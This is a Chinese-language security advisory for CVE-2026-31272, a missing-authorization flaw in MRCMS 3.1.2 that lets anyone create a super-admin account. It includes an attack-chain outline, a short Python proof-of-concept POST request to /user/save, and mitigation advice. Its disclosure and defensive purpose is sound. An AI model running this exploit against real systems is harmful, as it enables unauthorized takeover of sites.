CVE-2026-31272 CVSS 9.8 严重

CVE-2026-31272 MRCMS未授权添加管理员漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31272

漏洞类型

权限绕过

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MRCMS

漏洞概述

MRCMS 3.1.2版本存在严重的访问控制漏洞。由于UserController.java中的save()方法缺乏授权验证，攻击者可在无需认证的情况下通过发送恶意请求直接创建超级管理员账户，从而完全接管系统。

技术细节

该漏洞源于Java后端代码中缺失了关键的业务逻辑校验。在MRCMS的`src/main/java/org/marker/mushroom/controller/UserController.java`文件里，`save()`方法负责处理用户保存操作，但未对调用者的身份和权限进行校验。攻击者只需向该接口发送包含管理员权限参数的POST请求，服务器便会直接执行SQL插入操作。由于无需登录即可调用，这属于标准的Broken Access Control（失效的访问控制）漏洞，攻击者利用此漏洞可瞬间获得系统的最高控制权。

攻击链分析

STEP 1

1. 信息收集

识别运行MRCMS 3.1.2的目标服务器及其用户管理接口路径。

STEP 2

2. 漏洞利用

向UserController的save接口发送未经身份验证的POST请求，载荷包含超级管理员账户信息。

STEP 3

3. 权限提升

服务器由于缺乏校验，成功在数据库中插入攻击者控制的超级管理员账户。

STEP 4

4. 系统控制

攻击者使用新创建的超级管理员账户登录后台，获取系统完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Target URL (example) target = "http://TARGET_IP/user/save" # Data to create a super admin # Parameters depend on the actual entity definition data = { "username": "hackadmin", "password": "Admin123!", "roleId": 1, # Assuming 1 is the super admin role ID "email": "[email protected]" } try: r = requests.post(target, data=data) if r.status_code == 200: print(f"[+] Exploit successful! Response: {r.text}") else: print(f"[-] Exploit failed. Status: {r.status_code}") except Exception as e: print(f"Error: {e}")

影响范围

MRCMS 3.1.2

防御指南

临时缓解措施

在修复代码补丁发布前，建议在应用网关或WAF层面对/user/save接口实施严格的IP白名单策略，或临时通过代码修改强制要求该接口必须携带有效的管理员Session Token才能访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表